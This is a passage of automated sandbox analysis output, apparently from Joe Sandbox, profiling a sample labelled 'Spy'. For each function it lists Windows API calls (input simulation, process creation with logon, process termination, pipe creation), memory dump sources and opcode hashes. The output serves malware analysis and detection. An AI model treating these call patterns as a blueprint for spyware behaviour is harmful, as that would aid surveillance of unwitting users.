                                                      • Opcode ID: cdeb5afe666866639409edc1f8c231c2ffef7c442205447abe104edea6e824f6
                                                      • Instruction ID: a3809c7c9c402eaf7991f2a8a8beb4a7259b7396175c08f56b1cc094872cb8e3
                                                      • Opcode Fuzzy Hash: cdeb5afe666866639409edc1f8c231c2ffef7c442205447abe104edea6e824f6
                                                      • Instruction Fuzzy Hash: 4641F634604145AFDB26DF28C489F95BFE1EB05314F1882F9EA588F2E2CB71A855CB51
                                                      APIs
                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00AF550C,?,?,00000000,00000001), ref: 00AF7796
                                                        • Part of subcall function 00AF406C: GetWindowRect.USER32(?,?), ref: 00AF407F
                                                      • GetDesktopWindow.USER32 ref: 00AF77C0
                                                      • GetWindowRect.USER32(00000000), ref: 00AF77C7
                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00AF77F9
                                                        • Part of subcall function 00AE57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AE5877
                                                      • GetCursorPos.USER32(?), ref: 00AF7825
                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00AF7883
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                      • String ID:
                                                      • API String ID: 4137160315-0
                                                      • Opcode ID: 212c698b17a3386228d0e0696f7199da42f55fde939e36205538b4ecc5da3980
                                                      • Instruction ID: bc277347153f81a557d854087b32b4b1847835aeef7455730b769fae90fd811e
                                                      • Opcode Fuzzy Hash: 212c698b17a3386228d0e0696f7199da42f55fde939e36205538b4ecc5da3980
                                                      • Instruction Fuzzy Hash: 8C31B272508309ABD720DF54D849FAFB7AAFF88354F004929F58597191CB70E958CBE2
                                                      APIs
                                                        • Part of subcall function 00AD8CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AD8CDE
                                                        • Part of subcall function 00AD8CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AD8CE8
                                                        • Part of subcall function 00AD8CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AD8CF7
                                                        • Part of subcall function 00AD8CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AD8CFE
                                                        • Part of subcall function 00AD8CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AD8D14
                                                      • GetLengthSid.ADVAPI32(?,00000000,00AD904D), ref: 00AD9482
                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00AD948E
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00AD9495
                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00AD94AE
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00AD904D), ref: 00AD94C2
                                                      • HeapFree.KERNEL32(00000000), ref: 00AD94C9
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                      • String ID:
                                                      • API String ID: 3008561057-0
                                                      • Opcode ID: 1b9bd21465ea8a8e11ee3e3195bceed40ba834c578613816570eac4598cad47d
                                                      • Instruction ID: 5f78bd66db3e32afcd41ead27118adcf1ea4b8bee85552c7fbf39792a2db6f09
                                                      • Opcode Fuzzy Hash: 1b9bd21465ea8a8e11ee3e3195bceed40ba834c578613816570eac4598cad47d
                                                      • Instruction Fuzzy Hash: 7D11AFB1611604FFDB10AFA4CC09BEF7BA9EB45315F50801AF946A7211CB399941CB60
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00AD9200
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00AD9207
                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00AD9216
                                                      • CloseHandle.KERNEL32(00000004), ref: 00AD9221
                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AD9250
                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00AD9264
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                      • String ID:
                                                      • API String ID: 1413079979-0
                                                      • Opcode ID: b7cf7d7a3138d66ec484d88a76a9e0e8d4037813e47eb625264dc43fffbb50a6
                                                      • Instruction ID: 351572198123ba09d62d7db9ac3e7106e11c91a817fb85ad230d843f5025b344
                                                      • Opcode Fuzzy Hash: b7cf7d7a3138d66ec484d88a76a9e0e8d4037813e47eb625264dc43fffbb50a6
                                                      • Instruction Fuzzy Hash: 3F11597250120EABDF019F94ED49FDE7BA9EF09304F048115FE05A2160C7B2DEA0EB60
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 00ADC34E
                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00ADC35F
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00ADC366
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00ADC36E
                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00ADC385
                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 00ADC397
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CapsDevice$Release
                                                      • String ID:
                                                      • API String ID: 1035833867-0
                                                      • Opcode ID: 95ca15c939626e9ce7fda7f3d78ea5fc7690128bb10ca61b13017a69c97e3d87
                                                      • Instruction ID: 6d29b1b8929c6781caeace71a443df91fbb1362e334959c6079b37d284e85869
                                                      • Opcode Fuzzy Hash: 95ca15c939626e9ce7fda7f3d78ea5fc7690128bb10ca61b13017a69c97e3d87
                                                      • Instruction Fuzzy Hash: F1014875E04319BBDF105BA59D49A9EBFB8EB48761F408066FA04EB340DA709D10CF50
                                                      APIs
                                                        • Part of subcall function 00A816CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A81729
                                                        • Part of subcall function 00A816CF: SelectObject.GDI32(?,00000000), ref: 00A81738
                                                        • Part of subcall function 00A816CF: BeginPath.GDI32(?), ref: 00A8174F
                                                        • Part of subcall function 00A816CF: SelectObject.GDI32(?,00000000), ref: 00A81778
                                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00B0C57C
                                                      • LineTo.GDI32(00000000,00000003,?), ref: 00B0C590
                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B0C59E
                                                      • LineTo.GDI32(00000000,00000000,?), ref: 00B0C5AE
                                                      • EndPath.GDI32(00000000), ref: 00B0C5BE
                                                      • StrokePath.GDI32(00000000), ref: 00B0C5CE
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                      • String ID:
                                                      • API String ID: 43455801-0
                                                      • Opcode ID: 2ffa1fa826f967513b505a88e599367b2d5789b906d183f8eaf820bdb161668a
                                                      • Instruction ID: 13ea90aab4ffb870198f6bc1b95ba08c267436fa95d76af938e993643b9bc76f
                                                      • Opcode Fuzzy Hash: 2ffa1fa826f967513b505a88e599367b2d5789b906d183f8eaf820bdb161668a
                                                      • Instruction Fuzzy Hash: 35111E7600010CBFDF12AF95DC89FDA7FADEB08354F048051B91856160DB71AE95DBA0
                                                      APIs
                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AA07EC
                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00AA07F4
                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AA07FF
                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AA080A
                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00AA0812
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AA081A
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Virtual
                                                      • String ID:
                                                      • API String ID: 4278518827-0
                                                      • Opcode ID: 3fabd94c9a239b85ad7656517368801a70e7c6f1da7b7b7f800cbffbcee196c6
                                                      • Instruction ID: e6b9146ef21e5d0cda0961027d71b4eac33549ddb6ca866d022f73448664e2c0
                                                      • Opcode Fuzzy Hash: 3fabd94c9a239b85ad7656517368801a70e7c6f1da7b7b7f800cbffbcee196c6
                                                      • Instruction Fuzzy Hash: C6016CB09017597DE3009F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A864CBE5
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00AE59B4
                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00AE59CA
                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00AE59D9
                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AE59E8
                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AE59F2
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AE59F9
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 839392675-0
                                                      • Opcode ID: b0936afb1bbc2a4861dfa55ac7b288e3caeffdf081ae721ced0a42505159cacd
                                                      • Instruction ID: 5f0c63ecda93286621af64d11a3a2350b7323c743a4103bc2b9a7632752b6fa4
                                                      • Opcode Fuzzy Hash: b0936afb1bbc2a4861dfa55ac7b288e3caeffdf081ae721ced0a42505159cacd
                                                      • Instruction Fuzzy Hash: AFF09032250158BFE3216B92AC0DEEF7B3CEFCBB11F404159FA00A2050DFE01A5186B5
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,?), ref: 00AE77FE
                                                      • EnterCriticalSection.KERNEL32(?,?,00A8C2B6,?,?), ref: 00AE780F
                                                      • TerminateThread.KERNEL32(00000000,000001F6,?,00A8C2B6,?,?), ref: 00AE781C
                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00A8C2B6,?,?), ref: 00AE7829
                                                        • Part of subcall function 00AE71F0: CloseHandle.KERNEL32(00000000,?,00AE7836,?,00A8C2B6,?,?), ref: 00AE71FA
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00AE783C
                                                      • LeaveCriticalSection.KERNEL32(?,?,00A8C2B6,?,?), ref: 00AE7843
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                      • String ID:
                                                      • API String ID: 3495660284-0
                                                      • Opcode ID: 0af02055c0d74b44153125cbe59f5655ef408dc9fdf1369dba1c3e1f538a5c79
                                                      • Instruction ID: de08b84e8b315df8c232ee00878d109e2e9d45595fd7876bf220b09a77ef3fea
                                                      • Opcode Fuzzy Hash: 0af02055c0d74b44153125cbe59f5655ef408dc9fdf1369dba1c3e1f538a5c79
                                                      • Instruction Fuzzy Hash: 4EF08232555212ABD7113B64EC8CAEF7739FF49302F944525F503A60A0DFF95891CBA0
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AD9555
                                                      • UnloadUserProfile.USERENV(?,?), ref: 00AD9561
                                                      • CloseHandle.KERNEL32(?), ref: 00AD956A
                                                      • CloseHandle.KERNEL32(?), ref: 00AD9572
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00AD957B
                                                      • HeapFree.KERNEL32(00000000), ref: 00AD9582
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                      • String ID:
                                                      • API String ID: 146765662-0
                                                      • Opcode ID: 6f55343c1dabc5faae9105687e4e76edf67c182d59f3c0519c3de26f9f83d3c7
                                                      • Instruction ID: 2d4c226933ea4cc0c2c9c4ee00ff66c4d6d1c7faedebc20d1ce05ee146b53cc2
                                                      • Opcode Fuzzy Hash: 6f55343c1dabc5faae9105687e4e76edf67c182d59f3c0519c3de26f9f83d3c7
                                                      • Instruction Fuzzy Hash: C0E0E536114105BBDB012FE1EC0C99ABF39FF4A722B908220F225920B0CFB6A4B0DB50
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00AF8CFD
                                                      • CharUpperBuffW.USER32(?,?), ref: 00AF8E0C
                                                      • VariantClear.OLEAUT32(?), ref: 00AF8F84
                                                        • Part of subcall function 00AE7B1D: VariantInit.OLEAUT32(00000000), ref: 00AE7B5D
                                                        • Part of subcall function 00AE7B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00AE7B66
                                                        • Part of subcall function 00AE7B1D: VariantClear.OLEAUT32(00000000), ref: 00AE7B72
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                      • API String ID: 4237274167-1221869570
                                                      • Opcode ID: 4187268d65fd39ae6e58ce7ef34190fd68f73ebb3d800e63c071a88938743c22
                                                      • Instruction ID: da885326d52322ccac5fe03a72c3a093ff5b3c82f83baf7505903b8ce4f8b55e
                                                      • Opcode Fuzzy Hash: 4187268d65fd39ae6e58ce7ef34190fd68f73ebb3d800e63c071a88938743c22
                                                      • Instruction Fuzzy Hash: 6A91AD706083059FCB00EF64C58096ABBF5EF89754F14896EF98A8B3A1DB30ED45CB52
                                                      APIs
                                                        • Part of subcall function 00A9436A: _wcscpy.LIBCMT ref: 00A9438D
                                                      • _memset.LIBCMT ref: 00AE332E
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AE335D
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AE3410
                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00AE343E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                      • String ID: 0
                                                      • API String ID: 4152858687-4108050209
                                                      • Opcode ID: b08ce1340a0dc4eb60816b7d9d58fa189cc428ac00a961894d54b777955f7c7c
                                                      • Instruction ID: 8af6c38b236d61ccbd0df0b5461c3128fc89eb17d7b00b328a4fc7da7a22a8ad
                                                      • Opcode Fuzzy Hash: b08ce1340a0dc4eb60816b7d9d58fa189cc428ac00a961894d54b777955f7c7c
                                                      • Instruction Fuzzy Hash: 42510332208381ABCF12AF2AC949A6BB7E8EF55320F04492DF895D71D1DB70CE44CB52
                                                      APIs
                                                      • _memset.LIBCMT ref: 00AE2F67
                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00AE2F83
                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00AE2FC9
                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B47890,00000000), ref: 00AE3012
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Menu$Delete$InfoItem_memset
                                                      • String ID: 0
                                                      • API String ID: 1173514356-4108050209
                                                      • Opcode ID: c471b026fcf219d63153ddc4daed3df220df9c614773dc0160ebd31e503bd9b3
                                                      • Instruction ID: feb8ead44e348ddfb6797f08f918d8f526f96e1227b8109e2359a5d2d0cbc1ba
                                                      • Opcode Fuzzy Hash: c471b026fcf219d63153ddc4daed3df220df9c614773dc0160ebd31e503bd9b3
                                                      • Instruction Fuzzy Hash: 5841C6322043819FDB20DF26C889B5ABBE9FF85310F144A5DF5A6972D1DB70EA05CB52
                                                      APIs
                                                        • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                        • Part of subcall function 00ADB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ADB7BD
                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00AD9ACC
                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00AD9ADF
                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00AD9B0F
                                                        • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$_memmove$ClassName
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 365058703-1403004172
                                                      • Opcode ID: b8031fb86cc39617c3efa3c6e8d4bdb494acc09c992f5462cdcce15bcafa158f
                                                      • Instruction ID: 87b7b29372d0578f06191f0f09bf68684bee2f90174d1e1f3174c032a5cd8d53
                                                      • Opcode Fuzzy Hash: b8031fb86cc39617c3efa3c6e8d4bdb494acc09c992f5462cdcce15bcafa158f
                                                      • Instruction Fuzzy Hash: 4721E471A41104BEDF14ABA4DC45CFFB7BCDF513A0F61411BF826972E1DB3489469660
                                                      APIs
                                                        • Part of subcall function 00A82111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A8214F
                                                        • Part of subcall function 00A82111: GetStockObject.GDI32(00000011), ref: 00A82163
                                                        • Part of subcall function 00A82111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A8216D
                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B06A86
                                                      • LoadLibraryW.KERNEL32(?), ref: 00B06A8D
                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B06AA2
                                                      • DestroyWindow.USER32(?), ref: 00B06AAA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                      • String ID: SysAnimate32
                                                      • API String ID: 4146253029-1011021900
                                                      • Opcode ID: e0ed57db6932d01a3270d12b04f8713dc1abae1c29fcd53e96844186743670ef
                                                      • Instruction ID: be5299fd61bcc77fdbacbd5c470e7eb6a271a1c7cd4dde7befccacbb2cd7ee4b
                                                      • Opcode Fuzzy Hash: e0ed57db6932d01a3270d12b04f8713dc1abae1c29fcd53e96844186743670ef
                                                      • Instruction Fuzzy Hash: 8C21BB71300205AFEF10AEA49C80EBB7BE8EB49324F509258FA50A30D1D7718CA09760
                                                      APIs
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00AE7377
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AE73AA
